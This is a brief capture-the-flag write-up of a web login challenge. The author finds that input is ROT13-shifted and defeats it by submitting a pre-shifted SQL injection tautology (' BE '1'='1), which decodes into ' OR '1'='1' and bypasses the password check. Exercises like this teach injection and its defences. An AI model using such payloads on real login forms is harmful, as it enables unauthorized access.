The login form is different from the Prev challenge
On trying to log in:
password: pass
SQL query: SELECT * FROM admin where password = 'cnff'
Trying SQL injection:
password: ' OR '1'='1
SQL query: SELECT * FROM admin where password = '' BE '1'='1'
Clearly, the alphabetical characters are being shifted, so enter a shifted password:
password: ' BE '1'='1
SQL query: SELECT * FROM admin where password = '' OR '1'='1'